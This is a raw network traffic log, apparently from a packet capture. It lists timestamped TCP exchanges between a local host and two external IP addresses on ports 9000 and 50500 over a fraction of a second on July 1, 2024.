Jul 1, 2024 09:16:32.199680090 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.199685097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199719906 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.199778080 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199790955 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199803114 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199815035 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199815989 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.199826956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199839115 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.199840069 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199851990 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199873924 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.199892998 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.199938059 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199950933 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199961901 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199980974 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.200006008 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.201832056 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.201936960 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.201948881 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.201960087 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.201970100 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.201982021 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.201986074 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.201993942 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202004910 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.202004910 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202018023 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202028036 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.202045918 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.202097893 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202111006 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202122927 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202132940 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202133894 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.202145100 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202166080 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.202191114 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.202461958 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202475071 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202497959 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.202512980 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.202606916 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202630997 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202642918 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202647924 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.202655077 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202662945 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.202666998 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.202680111 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.202696085 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.203239918 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203252077 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203282118 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.203306913 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.203362942 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203382015 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203394890 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203399897 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.203407049 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203417063 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.203421116 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203434944 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.203460932 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.203541040 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203561068 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203572035 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203583002 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203594923 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203607082 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203617096 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.203619003 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203640938 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.203655958 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.203722000 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203732967 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203744888 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203762054 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.203783035 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.203880072 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203892946 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.203933001 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.204047918 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.204060078 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.204092026 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.205498934 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.205512047 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.205523014 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.205533981 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.205554008 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.205575943 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.205647945 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.205663919 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.205673933 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.205686092 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.205693007 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.205708027 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.205723047 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.207899094 CEST	50500	49786	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:32.207951069 CEST	49786	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:32.207995892 CEST	49786	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:32.213289022 CEST	50500	49786	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:32.217524052 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.217538118 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.217550993 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.217561960 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.217575073 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.217576981 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.217586994 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.217598915 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.217608929 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.217624903 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.217649937 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.219158888 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.219208956 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.253107071 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.253129959 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.253144026 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.253154993 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.253168106 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.253170013 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.253207922 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.253215075 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.253252029 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.253266096 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.253292084 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.253319025 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.273046970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.273073912 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.273085117 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.273097038 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.273116112 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.273128033 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.273133993 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.273139000 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.273152113 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.273159027 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.273199081 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.275506973 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.275522947 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.275585890 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.275585890 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.276256084 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.276268959 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.276279926 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.276295900 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.276300907 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.276308060 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.276315928 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.276321888 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.276335955 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.276362896 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.279186010 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.279200077 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.279212952 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.279246092 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.279273987 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.279290915 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.279304028 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.279316902 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.279330015 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.279336929 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.279350996 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.279366970 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.280061960 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280083895 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280093908 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280123949 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.280142069 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.280191898 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280205011 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280216932 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280229092 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.280230045 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280241966 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280247927 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.280267954 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.280288935 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.280312061 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280323982 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280334949 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280364037 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.280386925 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.280426025 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280438900 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280450106 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.280478954 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.280495882 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.287770987 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287782907 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287794113 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287806034 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287817955 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287844896 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287857056 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287867069 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287878990 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287892103 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287910938 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287923098 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287940979 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287952900 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.287966967 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288397074 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288418055 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288429022 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288439989 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288451910 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288463116 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288578987 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288589954 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288602114 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288613081 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288625956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288638115 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288746119 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288923979 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288935900 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.288950920 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289042950 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289056063 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289068937 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289079905 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289231062 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.289273024 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.289293051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289303064 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289313078 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289325953 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289339066 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.289344072 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289356947 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.289357901 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289371967 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.289377928 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289388895 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.289390087 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.289414883 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.289434910 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.290671110 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.290683031 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.290693998 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.290719986 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.290739059 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.290745020 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.290751934 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.290776014 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.290786028 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.290817976 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.290832043 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.290875912 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.291390896 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.291450977 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.291459084 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.291470051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.291497946 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.291512966 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.291516066 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.291523933 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.291537046 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.291548967 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.291558981 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.291562080 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.291583061 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.291615963 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.295239925 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.295260906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.295270920 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.295298100 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.295327902 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.295331001 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.295340061 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.295351982 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.295363903 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.295365095 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.295376062 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.295398951 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.295419931 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.296014071 CEST	50500	49786	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:32.308345079 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.308357954 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.308370113 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.308403015 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.308414936 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.308424950 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.308428049 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.308439970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.308468103 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.308479071 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.311045885 CEST	50500	49787	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:32.313885927 CEST	49787	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:32.314138889 CEST	49787	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:32.318943024 CEST	50500	49787	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:32.343297958 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.343312025 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.343323946 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.343334913 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.343348026 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.343358994 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.343370914 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.343394041 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.343442917 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.360826969 CEST	49786	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:32.363646984 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.363661051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.363673925 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.363711119 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.363729000 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.363744020 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.363756895 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.363769054 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.363780975 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.363797903 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.363827944 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.366620064 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.366631985 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.366642952 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.366682053 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.366686106 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.366693974 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.366705894 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.366719961 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.366739035 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.366761923 CEST	49782	9000	192.168.2.4	195.201.251.214
